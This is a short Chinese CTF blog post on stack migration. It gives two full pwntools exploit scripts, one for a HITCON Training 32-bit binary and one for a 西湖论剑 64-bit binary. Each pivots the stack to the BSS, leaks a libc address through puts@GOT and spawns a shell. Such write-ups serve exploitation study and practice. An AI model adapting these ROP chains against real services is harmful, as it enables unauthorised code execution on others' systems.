pwning

创建时间:
阅读:
  1. Pwning Magic
    1. Stack Migration
    2. HITCON Training
    3. 西湖论剑线下赛 pwn main

Pwning Magic

Stack Migration

Download link:

https://github.com/primelyw/pwn

HITCON Training

from pwn import *
p = process('./migration')
context.arch = 'i386'
elf = ELF('./migration',False)
libc = ELF('/lib/i386-linux-gnu/libc.so.6',False)
bss = elf.bss()
buf = bss+0x200
buf2 = bss+0x300
leave_ret = 0x08048504
pop_ebx_ret = 0x0804836d
read_plt = elf.symbols['read']
read_got = elf.got['read']
puts_got = elf.got['puts']
puts_plt = elf.symbols['puts']
puts_libc = libc.symbols['puts']
sys_libc = libc.symbols['system']

p.recvuntil(':\n')
pay = 'a'*0x28+flat([buf,read_plt,leave_ret,0,buf,100])
p.send(pay)
sleep(0.01)
pay = flat([buf2,puts_plt,pop_ebx_ret,puts_got,read_plt,leave_ret,0,buf2,100])
p.send(pay)

puts_real = u32(p.recv(4))
print hex(puts_real)

libc_base = puts_real - puts_libc
sys_real = libc_base + sys_libc

pay = flat([0,sys_real,0,buf2+4*4,'/bin/sh\x00'])
p.sendline(pay)

p.interactive()

西湖论剑线下赛 pwn main

64位栈迁移

#!/usr/bin/env python
#coding=utf8
from pwn import *
p = process('./main')
context.arch = 'amd64'
elf = ELF('./main',False)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6',False)

if 0:
    context.log_level = 'debug'
    context.terminal = ['tmux','splitw','-h']
    gdb.attach(p)

puts_plt = elf.symbols['puts']
puts_got  = elf.got['puts']
read_plt = elf.symbols['read']
puts_libc = libc.symbols['puts']
main_addr = 0x4006C3
pop_rdi_ret = 0x00000000004007a3
leave_ret = 0x0000000000400733
pop_rbp_ret =  0x00000000004005e0
read_leave_ret = 0x400718 #lea rax, [rbp-40h]
one_off = 0xf1147

#bss = elf.bss#0x602000-0x200
name_addr = 0x00601080
buf = 0x0601080+0x600
buf2 = buf+0x100

p.recvuntil('Input Your Name:\n')
rop = '\x00'*0x100
rop += flat([buf2,pop_rdi_ret,puts_got,puts_plt,read_leave_ret])
p.send(rop)
p.recvuntil('Input Buffer:\n')
rop = 'a'*0x40; rop += flat([name_addr+0x100,leave_ret])
p.send(rop)
puts_real = u64(p.recv(6)+'\x00'*2)
one = puts_real - puts_libc + one_off
print hex(one)
rop = flat([one,0,0,0,0,0,0,0,buf2-0x48,leave_ret])
p.send(rop)

p.interactive()
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论。

文章标题:pwning

本文作者:枫云李

发布时间:2019-05-10, 00:00:00

最后更新:2020-01-16, 02:06:12

原始链接:https://primelyw.github.io/2019/05/10/pwning/

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

©2020 枫云李

Built with Hexo and 3-hexo theme

目录
github